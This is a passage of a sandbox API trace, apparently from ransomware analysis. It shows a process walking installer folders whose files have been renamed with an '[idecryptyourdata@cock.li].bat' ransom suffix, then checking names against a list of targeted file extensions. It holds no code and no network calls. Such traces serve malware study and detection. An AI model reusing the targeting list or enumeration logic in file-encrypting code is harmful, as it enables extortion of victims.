ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0a1541, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0a1541, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.552] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0a1541, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0a1541, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0a1541, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.552] FindClose (in: hFindFile=0x728388 | out: hFindFile=0x728388) returned 1 [0155.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.576] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1032", cAlternateFileName="")) returned 1 [0155.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.576] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727d88 [0155.577] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.577] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3c291e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3c291e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd45af2a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2394, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.578] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3c291e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3c291e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd4a74ae, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x15206, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.578] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0a1541, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0a1541, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0c761b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.578] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0a1541, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0a1541, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0c761b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.578] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0155.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.588] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1033", cAlternateFileName="")) returned 1 [0155.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.588] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728148 [0155.589] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.589] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd481149, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd481149, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd4a74ae, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xd64, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.590] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd4a74ae, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd4a74ae, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd4f38ea, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x12eb6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.590] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0c761b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0c761b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd519b42, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.739] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0c761b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0c761b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd519b42, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.739] FindClose (in: hFindFile=0x728148 | out: hFindFile=0x728148) returned 1 [0155.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.741] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1035", cAlternateFileName="")) returned 1 [0155.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.741] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728188 [0155.742] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.742] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd4cd5fb, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd4cd5fb, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd519b42, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf64, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.743] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd4f38ea, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd4f38ea, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd58c1f7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x12dd6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.743] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd113c12, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd113c12, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd58c1f7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.743] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd113c12, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd113c12, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd58c1f7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.743] FindClose (in: hFindFile=0x728188 | out: hFindFile=0x728188) returned 1 [0155.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.744] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1036", cAlternateFileName="")) returned 1 [0155.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.744] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727d08 [0155.745] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.745] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd519b42, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd519b42, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd565f3a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xeb4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.745] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd58c1f7, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd58c1f7, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd5b254b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x14516, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.745] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3c291e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3c291e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd3e87bc, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.746] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3c291e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3c291e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd3e87bc, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.746] FindClose (in: hFindFile=0x727d08 | out: hFindFile=0x727d08) returned 1 [0155.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.746] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1037", cAlternateFileName="")) returned 1 [0155.747] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037") returned 26 [0155.747] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212\\1037") returned 1 [0155.747] lstrlenW (lpString="1037") returned 4 [0155.747] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="1037") returned 1 [0155.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.747] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037") returned 26 [0155.747] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727d48 [0155.748] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.748] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5b254b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5b254b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd5b254b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1bb4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.748] lstrlenW (lpString="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat") returned 51 [0155.748] lstrlenW (lpString=".1cd") returned 4 [0155.748] lstrcmpiW (lpString1=".1cd", lpString2=".bat") returned -1 [0155.748] lstrlenW (lpString=".3ds") returned 4 [0155.748] lstrcmpiW (lpString1=".3ds", lpString2=".bat") returned -1 [0155.748] lstrlenW (lpString=".3fr") returned 4 [0155.748] lstrcmpiW (lpString1=".3fr", lpString2=".bat") returned -1 [0155.748] lstrlenW (lpString=".3g2") returned 4 [0155.748] lstrcmpiW (lpString1=".3g2", lpString2=".bat") returned -1 [0155.748] lstrlenW (lpString=".3gp") returned 4 [0155.748] lstrcmpiW (lpString1=".3gp", lpString2=".bat") returned -1 [0155.748] lstrlenW (lpString=".7z") returned 3 [0155.748] lstrcmpiW (lpString1=".7z", lpString2="bat") returned -1 [0155.748] lstrlenW (lpString=".accda") returned 6 [0155.748] lstrcmpiW (lpString1=".accda", lpString2="i].bat") returned -1 [0155.748] lstrlenW (lpString=".accdb") returned 6 [0155.748] lstrcmpiW (lpString1=".accdb", lpString2="i].bat") returned -1 [0155.748] lstrlenW (lpString=".accdc") returned 6 [0155.749] lstrcmpiW (lpString1=".accdc", lpString2="i].bat") returned -1 [0155.749] lstrlenW (lpString=".accde") returned 6 [0155.749] lstrcmpiW (lpString1=".accde", lpString2="i].bat") returned -1 [0155.749] lstrlenW (lpString=".accdt") returned 6 [0155.749] lstrcmpiW (lpString1=".accdt", lpString2="i].bat") returned -1 [0155.749] lstrlenW (lpString=".accdw") returned 6 [0155.749] lstrcmpiW (lpString1=".accdw", lpString2="i].bat") returned -1 [0155.749] lstrlenW (lpString=".adb") returned 4 [0155.749] lstrcmpiW (lpString1=".adb", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".adp") returned 4 [0155.749] lstrcmpiW (lpString1=".adp", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".ai") returned 3 [0155.749] lstrcmpiW (lpString1=".ai", lpString2="bat") returned -1 [0155.749] lstrlenW (lpString=".ai3") returned 4 [0155.749] lstrcmpiW (lpString1=".ai3", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".ai4") returned 4 [0155.749] lstrcmpiW (lpString1=".ai4", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".ai5") returned 4 [0155.749] lstrcmpiW (lpString1=".ai5", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".ai6") returned 4 [0155.749] lstrcmpiW (lpString1=".ai6", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".ai7") returned 4 [0155.749] lstrcmpiW (lpString1=".ai7", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".ai8") returned 4 [0155.749] lstrcmpiW (lpString1=".ai8", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".anim") returned 5 [0155.749] lstrcmpiW (lpString1=".anim", lpString2="].bat") returned -1 [0155.749] lstrlenW (lpString=".arw") returned 4 [0155.749] lstrcmpiW (lpString1=".arw", lpString2=".bat") returned -1 [0155.749] lstrlenW (lpString=".as") returned 3 [0155.749] lstrcmpiW (lpString1=".as", lpString2="bat") returned -1 [0155.749] lstrlenW (lpString=".asa") returned 4 [0155.750] lstrcmpiW (lpString1=".asa", lpString2=".bat") returned -1 [0155.750] lstrlenW (lpString=".asc") returned 4 [0155.750] lstrcmpiW (lpString1=".asc", lpString2=".bat") returned -1 [0155.750] lstrlenW (lpString=".ascx") returned 5 [0155.750] lstrcmpiW (lpString1=".ascx", lpString2="].bat") returned -1 [0155.750] lstrlenW (lpString=".asm") returned 4 [0155.750] lstrcmpiW (lpString1=".asm", lpString2=".bat") returned -1 [0155.750] lstrlenW (lpString=".asmx") returned 5 [0155.750] lstrcmpiW (lpString1=".asmx", lpString2="].bat") returned -1 [0155.750] lstrlenW (lpString=".asp") returned 4 [0155.750] lstrcmpiW (lpString1=".asp", lpString2=".bat") returned -1 [0155.750] lstrlenW (lpString=".aspx") returned 5 [0155.750] lstrcmpiW (lpString1=".aspx", lpString2="].bat") returned -1 [0155.750] lstrlenW (lpString=".asr") returned 4 [0155.750] lstrcmpiW (lpString1=".asr", lpString2=".bat") returned -1 [0155.750] lstrlenW (lpString=".asx") returned 4 [0155.750] lstrcmpiW (lpString1=".asx", lpString2=".bat") returned -1 [0155.750] lstrlenW (lpString=".avi") returned 4 [0155.750] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0155.750] lstrlenW (lpString=".avs") returned 4 [0155.750] lstrcmpiW (lpString1=".avs", lpString2=".bat") returned -1 [0155.750] lstrlenW 